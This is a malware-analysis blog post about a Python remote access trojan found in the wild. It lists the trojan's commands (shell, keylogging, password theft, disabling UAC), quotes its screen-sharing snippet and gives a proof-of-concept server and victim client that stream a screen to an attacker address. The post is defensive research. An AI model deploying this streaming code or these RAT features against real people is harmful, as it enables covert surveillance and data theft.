Python RAT with a Nice Screensharing Feature

Published: 2024-11-05. Last Updated: 2024-11-05 08:10:24 UTC
by Xavier Mertens (Version: 1)

While hunting, I found another interesting Python RAT in the wild. This is not brand new because the script was released two years ago[1]. The script I found is based on the same tool and still has a low VT score: 3/64 (SHA256:1281b7184278f2a4814b245b48256da32a6348b317b83c440008849a16682ccb)[2]. The RAT has a lot of features to control the victim's computer:

remnux@remnux:/MalwareZoo/20241021$ egrep "command ==" client.pyw 
            if command == 'shell':
                    if command == 'cd':
            elif command == 'screenshare':
            elif command == 'webcam':
            elif command == 'breakstream':
            elif command == 'list':
            elif command == 'geolocate':
            elif command == 'setvalue':
            elif command == 'delkey':
            elif command == 'createkey':
            elif command == 'volumeup':
            elif command == 'volumedown':
            elif command == 'setwallpaper':
            elif command == 'usbdrivers':
            elif command == 'monitors':
            elif command == 'sysinfo':
            elif command == 'reboot':
            elif command == 'pwd':
            elif command == 'ipconfig':
            elif command == 'portscan':
            elif command == 'tasklist':
            elif command == 'profiles':
            elif command == 'profilepswd':
            elif command == 'systeminfo':
            elif command == 'sendmessage':
            elif command == 'disableUAC':
            elif command == 'turnoffmon':
            elif command == 'turnonmon':
            elif command == 'extendrights':
            elif command == 'isuseradmin':
            elif command == 'keyscan_start':
            elif command == 'send_logs':
            elif command == 'stop_keylogger':
            elif command == 'cpu_cores':
            elif command == 'cd ..':
            elif command == 'dir':
            elif command == 'curpid':
            elif command == 'drivers':
            elif command == 'shutdown':
            elif command == 'disabletaskmgr':
            elif command == 'enabletaskmgr':
            elif command == 'localtime':
            elif command == 'upload':
            elif command == 'browser':
            elif command == 'screenshot':
            elif command == 'webcam_snap':
            elif command == 'exit':
            elif command == "PASSWORDS":

Taking screenshots is a classic feature but one of the commands attracted my attention: "screenshare". Let's have a closer look at this one:

try:
    from vidstream import ScreenShareClient
    screen = ScreenShareClient(self.host, 8080)
    screen.start_stream()
except:
    s.send("Impossible to get screen")

The magic feature is provided by the "vidstream" Python library. This library has not been updated for a few years but still does a great job. I made a quick proof-of-concept to demonstrate this nice capability of the RAT:

Let's run a server on the attacker's computer:

import time
from vidstream import StreamingServer
server = StreamingServer('192.168.131.205', 9999)
server.start_server()
print("Waiting for victim...")
while True:
    time.sleep(10)
# When You Are Done
server.stop_server()

On the victim's computer, let's run the following code:

from vidstream import CameraClient
from vidstream import VideoClient
from vidstream import ScreenShareClient
client1 = ScreenShareClient('192.168.131.202', 9999)
client1.start_stream()

In the screenshot below, the victim's VM is on the left (Windows 11), and the attacker's VM is on the right (REMnux):

Once the client is connected to the server, a window opens with a copy of the victim's screen. I recorded a short video when playing with the desktop[4]: